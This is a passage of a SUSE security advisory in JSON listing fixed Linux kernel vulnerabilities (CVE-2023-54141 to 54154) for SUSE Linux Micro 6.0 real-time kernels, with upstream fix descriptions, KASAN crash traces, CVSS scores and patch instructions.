"summary": "SUSE Bug 1256094 for CVE-2023-54141",
"url": "https://bugzilla.suse.com/1256094"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54141"
},
{
"cve": "CVE-2023-54142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngtp: Fix use-after-free in __gtp_encap_destroy().\n\nsyzkaller reported use-after-free in __gtp_encap_destroy(). [0]\n\nIt shows the same process freed sk and touched it illegally.\n\nCommit e198987e7dd7 (\"gtp: fix suspicious RCU usage\") added lock_sock()\nand release_sock() in __gtp_encap_destroy() to protect sk-\u003esk_user_data,\nbut release_sock() is called after sock_put() releases the last refcnt.\n\n[0]:\nBUG: KASAN: slab-use-after-free in instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\nBUG: KASAN: slab-use-after-free in atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\nBUG: KASAN: slab-use-after-free in queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\nBUG: KASAN: slab-use-after-free in do_raw_spin_lock include/linux/spinlock.h:186 [inline]\nBUG: KASAN: slab-use-after-free in __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\nBUG: KASAN: slab-use-after-free in _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\nWrite of size 4 at addr ffff88800dbef398 by task syz-executor.2/2401\n\nCPU: 1 PID: 2401 Comm: syz-executor.2 Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x72/0xa0 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:351 [inline]\n print_report+0xcc/0x620 mm/kasan/report.c:462\n kasan_report+0xb2/0xe0 mm/kasan/report.c:572\n check_region_inline mm/kasan/generic.c:181 [inline]\n kasan_check_range+0x39/0x1c0 mm/kasan/generic.c:187\n instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\n atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\n queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\n do_raw_spin_lock include/linux/spinlock.h:186 [inline]\n __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\n _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\n spin_lock_bh include/linux/spinlock.h:355 [inline]\n release_sock+0x1f/0x1a0 net/core/sock.c:3526\n gtp_encap_disable_sock drivers/net/gtp.c:651 [inline]\n gtp_encap_disable+0xb9/0x220 drivers/net/gtp.c:664\n gtp_dev_uninit+0x19/0x50 drivers/net/gtp.c:728\n unregister_netdevice_many_notify+0x97e/0x1520 net/core/dev.c:10841\n rtnl_delete_link net/core/rtnetlink.c:3216 [inline]\n rtnl_dellink+0x3c0/0xb30 net/core/rtnetlink.c:3268\n rtnetlink_rcv_msg+0x450/0xb10 net/core/rtnetlink.c:6423\n netlink_rcv_skb+0x15d/0x450 net/netlink/af_netlink.c:2548\n netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline]\n netlink_unicast+0x700/0x930 net/netlink/af_netlink.c:1365\n netlink_sendmsg+0x91c/0xe30 net/netlink/af_netlink.c:1913\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x1b7/0x200 net/socket.c:747\n ____sys_sendmsg+0x75a/0x990 net/socket.c:2493\n ___sys_sendmsg+0x11d/0x1c0 net/socket.c:2547\n __sys_sendmsg+0xfe/0x1d0 net/socket.c:2576\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3f/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\nRIP: 0033:0x7f1168b1fe5d\nCode: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 9f 1b 00 f7 d8 64 89 01 48\nRSP: 002b:00007f1167edccc8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 00000000004bbf80 RCX: 00007f1168b1fe5d\nRDX: 0000000000000000 RSI: 00000000200002c0 RDI: 0000000000000003\nRBP: 00000000004bbf80 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000000000b R14: 00007f1168b80530 R15: 0000000000000000\n \u003c/TASK\u003e\n\nAllocated by task 1483:\n kasan_save_stack+0x22/0x50 mm/kasan/common.c:45\n kasan_set_track+0x25/0x30 mm/kasan/common.c:52\n __kasan_slab_alloc+0x\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54142",
"url": "https://www.suse.com/security/cve/CVE-2023-54142"
},
{
"category": "external",
"summary": "SUSE Bug 1256095 for CVE-2023-54142",
"url": "https://bugzilla.suse.com/1256095"
},
{
"category": "external",
"summary": "SUSE Bug 1256097 for CVE-2023-54142",
"url": "https://bugzilla.suse.com/1256097"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2023-54142"
},
{
"cve": "CVE-2023-54143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: mediatek: vcodec: fix resource leaks in vdec_msg_queue_init()\n\nIf we encounter any error in the vdec_msg_queue_init() then we need\nto set \"msg_queue-\u003ewdma_addr.size = 0;\". Normally, this is done\ninside the vdec_msg_queue_deinit() function. However, if the\nfirst call to allocate \u0026msg_queue-\u003ewdma_addr fails, then the\nvdec_msg_queue_deinit() function is a no-op. For that situation, just\nset the size to zero explicitly and return.\n\nThere were two other error paths which did not clean up before returning.\nChange those error paths to goto mem_alloc_err.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54143",
"url": "https://www.suse.com/security/cve/CVE-2023-54143"
},
{
"category": "external",
"summary": "SUSE Bug 1256096 for CVE-2023-54143",
"url": "https://bugzilla.suse.com/1256096"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54143"
},
{
"cve": "CVE-2023-54145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: drop unnecessary user-triggerable WARN_ONCE in verifierl log\n\nIt\u0027s trivial for user to trigger \"verifier log line truncated\" warning,\nas verifier has a fixed-sized buffer of 1024 bytes (as of now), and there are at\nleast two pieces of user-provided information that can be output through\nthis buffer, and both can be arbitrarily sized by user:\n - BTF names;\n - BTF.ext source code lines strings.\n\nVerifier log buffer should be properly sized for typical verifier state\noutput. But it\u0027s sort-of expected that this buffer won\u0027t be long enough\nin some circumstances. So let\u0027s drop the check. In any case code will\nwork correctly, at worst truncating a part of a single line output.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54145",
"url": "https://www.suse.com/security/cve/CVE-2023-54145"
},
{
"category": "external",
"summary": "SUSE Bug 1256090 for CVE-2023-54145",
"url": "https://bugzilla.suse.com/1256090"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54145"
},
{
"cve": "CVE-2023-54148",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54148"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Move representor neigh cleanup to profile cleanup_tx\n\nFor IP tunnel encapsulation in ECMP (Equal-Cost Multipath) mode, as\nthe flow is duplicated to the peer eswitch, the related neighbour\ninformation on the peer uplink representor is created as well.\n\nIn the cited commit, eswitch devcom unpair is moved to uplink unload\nAPI, specifically the profile-\u003ecleanup_tx. If there is a encap rule\noffloaded in ECMP mode, when one eswitch does unpair (because of\nunloading the driver, for instance), and the peer rule from the peer\neswitch is going to be deleted, the use-after-free error is triggered\nwhile accessing neigh info, as it is already cleaned up in uplink\u0027s\nprofile-\u003edisable, which is before its profile-\u003ecleanup_tx.\n\nTo fix this issue, move the neigh cleanup to profile\u0027s cleanup_tx\ncallback, and after mlx5e_cleanup_uplink_rep_tx is called. The neigh\ninit is moved to init_tx for symmeter.\n\n[ 2453.376299] BUG: KASAN: slab-use-after-free in mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.379125] Read of size 4 at addr ffff888127af9008 by task modprobe/2496\n\n[ 2453.381542] CPU: 7 PID: 2496 Comm: modprobe Tainted: G B 6.4.0-rc7+ #15\n[ 2453.383386] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n[ 2453.384335] Call Trace:\n[ 2453.384625] \u003cTASK\u003e\n[ 2453.384891] dump_stack_lvl+0x33/0x50\n[ 2453.385285] print_report+0xc2/0x610\n[ 2453.385667] ? __virt_addr_valid+0xb1/0x130\n[ 2453.386091] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.386757] kasan_report+0xae/0xe0\n[ 2453.387123] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.387798] mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.388465] mlx5e_rep_encap_entry_detach+0xa6/0xe0 [mlx5_core]\n[ 2453.389111] mlx5e_encap_dealloc+0xa7/0x100 [mlx5_core]\n[ 2453.389706] mlx5e_tc_tun_encap_dests_unset+0x61/0xb0 [mlx5_core]\n[ 2453.390361] mlx5_free_flow_attr_actions+0x11e/0x340 [mlx5_core]\n[ 2453.391015] ? complete_all+0x43/0xd0\n[ 2453.391398] ? free_flow_post_acts+0x38/0x120 [mlx5_core]\n[ 2453.392004] mlx5e_tc_del_fdb_flow+0x4ae/0x690 [mlx5_core]\n[ 2453.392618] mlx5e_tc_del_fdb_peers_flow+0x308/0x370 [mlx5_core]\n[ 2453.393276] mlx5e_tc_clean_fdb_peer_flows+0xf5/0x140 [mlx5_core]\n[ 2453.393925] mlx5_esw_offloads_unpair+0x86/0x540 [mlx5_core]\n[ 2453.394546] ? mlx5_esw_offloads_set_ns_peer.isra.0+0x180/0x180 [mlx5_core]\n[ 2453.395268] ? down_write+0xaa/0x100\n[ 2453.395652] mlx5_esw_offloads_devcom_event+0x203/0x530 [mlx5_core]\n[ 2453.396317] mlx5_devcom_send_event+0xbb/0x190 [mlx5_core]\n[ 2453.396917] mlx5_esw_offloads_devcom_cleanup+0xb0/0xd0 [mlx5_core]\n[ 2453.397582] mlx5e_tc_esw_cleanup+0x42/0x120 [mlx5_core]\n[ 2453.398182] mlx5e_rep_tc_cleanup+0x15/0x30 [mlx5_core]\n[ 2453.398768] mlx5e_cleanup_rep_tx+0x6c/0x80 [mlx5_core]\n[ 2453.399367] mlx5e_detach_netdev+0xee/0x120 [mlx5_core]\n[ 2453.399957] mlx5e_netdev_change_profile+0x84/0x170 [mlx5_core]\n[ 2453.400598] mlx5e_vport_rep_unload+0xe0/0xf0 [mlx5_core]\n[ 2453.403781] mlx5_eswitch_unregister_vport_reps+0x15e/0x190 [mlx5_core]\n[ 2453.404479] ? mlx5_eswitch_register_vport_reps+0x200/0x200 [mlx5_core]\n[ 2453.405170] ? up_write+0x39/0x60\n[ 2453.405529] ? kernfs_remove_by_name_ns+0xb7/0xe0\n[ 2453.405985] auxiliary_bus_remove+0x2e/0x40\n[ 2453.406405] device_release_driver_internal+0x243/0x2d0\n[ 2453.406900] ? kobject_put+0x42/0x2d0\n[ 2453.407284] bus_remove_device+0x128/0x1d0\n[ 2453.407687] device_del+0x240/0x550\n[ 2453.408053] ? waiting_for_supplier_show+0xe0/0xe0\n[ 2453.408511] ? kobject_put+0xfa/0x2d0\n[ 2453.408889] ? __kmem_cache_free+0x14d/0x280\n[ 2453.409310] mlx5_rescan_drivers_locked.part.0+0xcd/0x2b0 [mlx5_core]\n[ 2453.409973] mlx5_unregister_device+0x40/0x50 [mlx5_core]\n[ 2453.410561] mlx5_uninit_one+0x3d/0x110 [mlx5_core]\n[ 2453.411111] remove_one+0x89/0x130 [mlx5_core]\n[ 24\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54148",
"url": "https://www.suse.com/security/cve/CVE-2023-54148"
},
{
"category": "external",
"summary": "SUSE Bug 1256084 for CVE-2023-54148",
"url": "https://bugzilla.suse.com/1256084"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54148"
},
{
"cve": "CVE-2023-54149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dsa: avoid suspicious RCU usage for synced VLAN-aware MAC addresses\n\nWhen using the felix driver (the only one which supports UC filtering\nand MC filtering) as a DSA master for a random other DSA switch, one can\nsee the following stack trace when the downstream switch ports join a\nVLAN-aware bridge:\n\n=============================\nWARNING: suspicious RCU usage\n-----------------------------\nnet/8021q/vlan_core.c:238 suspicious rcu_dereference_protected() usage!\n\nstack backtrace:\nWorkqueue: dsa_ordered dsa_slave_switchdev_event_work\nCall trace:\n lockdep_rcu_suspicious+0x170/0x210\n vlan_for_each+0x8c/0x188\n dsa_slave_sync_uc+0x128/0x178\n __hw_addr_sync_dev+0x138/0x158\n dsa_slave_set_rx_mode+0x58/0x70\n __dev_set_rx_mode+0x88/0xa8\n dev_uc_add+0x74/0xa0\n dsa_port_bridge_host_fdb_add+0xec/0x180\n dsa_slave_switchdev_event_work+0x7c/0x1c8\n process_one_work+0x290/0x568\n\nWhat it\u0027s saying is that vlan_for_each() expects rtnl_lock() context and\nit\u0027s not getting it, when it\u0027s called from the DSA master\u0027s ndo_set_rx_mode().\n\nThe caller of that - dsa_slave_set_rx_mode() - is the slave DSA\ninterface\u0027s dsa_port_bridge_host_fdb_add() which comes from the deferred\ndsa_slave_switchdev_event_work().\n\nWe went to great lengths to avoid the rtnl_lock() context in that call\npath in commit 0faf890fc519 (\"net: dsa: drop rtnl_lock from\ndsa_slave_switchdev_event_work\"), and calling rtnl_lock() is simply not\nan option due to the possibility of deadlocking when calling\ndsa_flush_workqueue() from the call paths that do hold rtnl_lock() -\nbasically all of them.\n\nSo, when the DSA master calls vlan_for_each() from its ndo_set_rx_mode(),\nthe state of the 8021q driver on this device is really not protected\nfrom concurrent access by anything.\n\nLooking at net/8021q/, I don\u0027t think that vlan_info-\u003evid_list was\nparticularly designed with RCU traversal in mind, so introducing an RCU\nread-side form of vlan_for_each() - vlan_for_each_rcu() - won\u0027t be so\neasy, and it also wouldn\u0027t be exactly what we need anyway.\n\nIn general I believe that the solution isn\u0027t in net/8021q/ anyway;\nvlan_for_each() is not cut out for this task. DSA doesn\u0027t need rtnl_lock()\nto be held per se - since it\u0027s not a netdev state change that we\u0027re\nblocking, but rather, just concurrent additions/removals to a VLAN list.\nWe don\u0027t even need sleepable context - the callback of vlan_for_each()\njust schedules deferred work.\n\nThe proposed escape is to remove the dependency on vlan_for_each() and\nto open-code a non-sleepable, rtnl-free alternative to that, based on\ncopies of the VLAN list modified from .ndo_vlan_rx_add_vid() and\n.ndo_vlan_rx_kill_vid().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54149",
"url": "https://www.suse.com/security/cve/CVE-2023-54149"
},
{
"category": "external",
"summary": "SUSE Bug 1256085 for CVE-2023-54149",
"url": "https://bugzilla.suse.com/1256085"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54149"
},
{
"cve": "CVE-2023-54153",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54153"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: turn quotas off if mount failed after enabling quotas\n\nYi found during a review of the patch \"ext4: don\u0027t BUG on inconsistent\njournal feature\" that when ext4_mark_recovery_complete() returns an error\nvalue, the error handling path does not turn off the enabled quotas,\nwhich triggers the following kmemleak:\n\n================================================================\nunreferenced object 0xffff8cf68678e7c0 (size 64):\ncomm \"mount\", pid 746, jiffies 4294871231 (age 11.540s)\nhex dump (first 32 bytes):\n00 90 ef 82 f6 8c ff ff 00 00 00 00 41 01 00 00 ............A...\nc7 00 00 00 bd 00 00 00 0a 00 00 00 48 00 00 00 ............H...\nbacktrace:\n[\u003c00000000c561ef24\u003e] __kmem_cache_alloc_node+0x4d4/0x880\n[\u003c00000000d4e621d7\u003e] kmalloc_trace+0x39/0x140\n[\u003c00000000837eee74\u003e] v2_read_file_info+0x18a/0x3a0\n[\u003c0000000088f6c877\u003e] dquot_load_quota_sb+0x2ed/0x770\n[\u003c00000000340a4782\u003e] dquot_load_quota_inode+0xc6/0x1c0\n[\u003c0000000089a18bd5\u003e] ext4_enable_quotas+0x17e/0x3a0 [ext4]\n[\u003c000000003a0268fa\u003e] __ext4_fill_super+0x3448/0x3910 [ext4]\n[\u003c00000000b0f2a8a8\u003e] ext4_fill_super+0x13d/0x340 [ext4]\n[\u003c000000004a9489c4\u003e] get_tree_bdev+0x1dc/0x370\n[\u003c000000006e723bf1\u003e] ext4_get_tree+0x1d/0x30 [ext4]\n[\u003c00000000c7cb663d\u003e] vfs_get_tree+0x31/0x160\n[\u003c00000000320e1bed\u003e] do_new_mount+0x1d5/0x480\n[\u003c00000000c074654c\u003e] path_mount+0x22e/0xbe0\n[\u003c0000000003e97a8e\u003e] do_mount+0x95/0xc0\n[\u003c000000002f3d3736\u003e] __x64_sys_mount+0xc4/0x160\n[\u003c0000000027d2140c\u003e] do_syscall_64+0x3f/0x90\n================================================================\n\nTo solve this problem, we add a \"failed_mount10\" tag, and call\next4_quota_off_umount() in this tag to release the enabled qoutas.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54153",
"url": "https://www.suse.com/security/cve/CVE-2023-54153"
},
{
"category": "external",
"summary": "SUSE Bug 1256081 for CVE-2023-54153",
"url": "https://bugzilla.suse.com/1256081"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54153"
},
{
"cve": "CVE-2023-54154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54154"
}
],
"notes": [
{
"category": "general",
